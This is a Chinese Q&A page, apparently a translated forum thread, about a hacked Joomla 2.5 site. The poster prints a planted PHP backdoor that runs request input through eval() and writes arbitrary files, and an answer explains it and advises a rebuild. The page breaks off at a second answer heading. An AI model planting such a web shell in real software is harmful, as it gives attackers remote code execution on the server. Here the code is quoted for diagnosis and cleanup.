黑客的Joomla 2.5

时间:2013-10-31 02:02:28

标签: joomla joomla2.5

我有一个客户的Joomla网站遭到黑客攻击,我不确定它是如何发生的但我可以看到有很多脚本发送垃圾邮件,搜索包含 eval(一词的文件/ strong>我找到了61个匹配项,如下面的文件:

<?php

    $lbdw = "495c05e857e328e1e65ca6b0bc03dc88";
if (isset($_REQUEST['tlhqdsj'])) {
    $mglvq = $_REQUEST['tlhqdsj'];
    eval($mglvq);
    exit();
}
if (isset($_REQUEST['ofva'])) {
    $ulmajcbk = $_REQUEST['tbun'];
    $cdpumv = $_REQUEST['ofva'];
    $tgcjl = fopen($cdpumv, 'w');
    $ogrmbcz = fwrite($tgcjl, $ulmajcbk);
    fclose($tgcjl);
    echo $ogrmbcz;
    exit();
}

?>

我不想删除整个网站,因为我没有开发它,我只需要一个安全检查表和一种搜索其他已知漏洞的方法。

我应该在安装此Joomla网站的服务器上采取哪些其他预防措施?

知道他们如何将这么多文件上传到服务器吗?

2 个答案:

答案 0 :(得分:2)

这是一个僵尸网络PHP文件,可能通过Joomla中的漏洞进行传播(例如,8月中旬就有一个漏洞)。它允许远程用户执行任意PHP代码并将文件上传到您的服务器。有关详细信息,请参阅Joomla security page

我最强烈的建议是擦除整个服务器 - 或者至少是客户用户可以访问的任何内容 - 并重新开始。你永远不知道攻击者上传了什么,你可以从来没有完全确定没有更多的后门存在。

如果这是不可行的,我建议擦除Joomla安装并重新安装Joomla 2.5.14或3.1.5的新副本。

如果您甚至无法,那么您可以尝试就地升级Joomla,搜索受感染的PHP文件并删除它们。但是你冒着很大的风险,你会错过一个文件并且仍然容易受到攻击。

答案 1 :(得分:2)